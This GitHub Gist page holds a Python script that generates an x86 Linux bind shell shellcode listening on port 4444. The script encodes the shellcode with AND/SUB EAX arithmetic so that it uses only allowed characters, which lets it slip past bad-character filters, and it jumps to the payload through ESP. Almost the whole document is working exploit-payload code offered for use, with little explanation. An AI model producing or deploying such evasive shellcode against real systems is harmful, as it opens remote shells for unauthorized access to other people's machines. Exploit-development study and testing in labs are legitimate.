Created
April 19, 2019 12:33
-
-
Save thesp0nge/8daae5ae9656779b75a479e72f2a4492 to your computer and use it in GitHub Desktop.
bind shell shellcode encoded with SUB EAX technique
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# Please install shellerate>=0.4.2 before: pip install shellerate | |
import sys | |
import string | |
import logging | |
import secrets | |
from shellerate import strings; | |
from shellerate import asm_x86; | |
from shellerate.bind_shellcode import BindShellcode; | |
# The code for find_encoded_sequence and generate_add_eax_sum_shellcode was | |
# taken from https://www.kerrymilan.com vulnserver works with some slight | |
# change and integrating into shellerate | |
def find_encoded_sequence(dword, three=False): | |
allowed="\x01\x02\x03\x04\x05\x06\x07\x08\x09\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3b\x3c\x3d\x3e\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7d" | |
a_int = [ord(n) for n in list(allowed)] | |
matches = [] | |
zero = False | |
carry = 0 | |
for x in range(0, 4): | |
byte = (dword - (carry | zero)) % 256 | |
found = False | |
l = [(f1, f2) for f1 in a_int for f2 in a_int] | |
if three: | |
l = [(f1, f2, f3) for f1 in a_int for f2 in a_int for f3 in a_int] | |
for i in l: | |
if not found and (sum(i) % 256) == byte and len(set(i) - set(a_int)) == 0: | |
found = True | |
carry = (sum(i) >= 0x100) | |
zero = False #(byte == 0xFF) | |
matches.append(i) | |
dword >>= 8 | |
return matches | |
def generate_add_eax_sum_shellcode(result): | |
compl_two = int("FFFFFFFF", 16) - int(result, 16) + 1 | |
c = find_encoded_sequence(compl_two) | |
c2_h = "0x{:08x}".format(compl_two) | |
f = ["".join(["{:02x}".format(j) for j in list(i)]) for i in zip(*c[::-1])] | |
f_sum = "0x{:08x}".format(sum([int(i, 16) for i in f]) % (2**32)) | |
if (c2_h != f_sum): | |
logging.warning("can't find a good encoded sequence using 2 operands... trying with 3") | |
c = find_encoded_sequence(compl_two, True) | |
f = ["".join(["{:02x}".format(j) for j in list(i)]) for i in zip(*c[::-1])] | |
f_sum = "0x{:08x}".format(sum([int(i, 16) for i in f]) % (2**32)) | |
if(c2_h != f_sum): | |
logging.error("can't find a good encoded sequence. Please consider changing this shellcode sequence" + result) | |
return "" | |
logging.debug("obtaining 0x{0} with this ASM sequence".format(result)) | |
for i in ("554e4d4a", "2a313235"): | |
logging.debug("AND EAX, 0x{0}".format(i)) | |
for j in f: | |
logging.debug("SUB EAX, 0x{0}".format(j)) | |
logging.debug("PUSH EAX") | |
shellcode = asm_x86.zero_with_and("eax") | |
for i in f: | |
shellcode += "\\x2d" + strings.from_string_to_payload(strings.swap(i)) | |
shellcode+="\\x50" | |
return shellcode | |
def generate_exploit(): | |
b=BindShellcode(4444, 'x86', 'linux') | |
b.generate() | |
original_shellcode = b.shellcode() | |
padded = strings.pad(original_shellcode) | |
o1 = strings.from_char_to_hexcode(padded) | |
reverse=strings.reverse(o1) | |
logging.debug(reverse) | |
words = strings.split(reverse, 8) | |
shellcode = "" | |
shellcode += asm_x86.zero_eax() | |
shellcode += asm_x86.get_esp_address_in_eax() | |
# shellcode += "\\x2d\\x66\\x4d\\x55\\x55\\x2d\\x66\\x4b\\x55\\x55\\x2d\\x6a\\x50\\x55\\x55" # get some free space into the stack | |
# shellcode += "\\x50\\x5c" #PUSH EAX + POP ESP | |
for w in words: | |
logging.debug(w) | |
shellcode += generate_add_eax_sum_shellcode(w) | |
shellcode += "\\xff\\xe4"; | |
return shellcode | |
if __name__ == "__main__": | |
logging.basicConfig(format='[%(levelname)s] %(asctime)s - %(message)s', | |
level=logging.DEBUG, | |
datefmt='%d/%b/%y %H:%M:%S') | |
logging.debug("GENERATING shellcode") | |
sc=generate_exploit() | |
print(sc) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment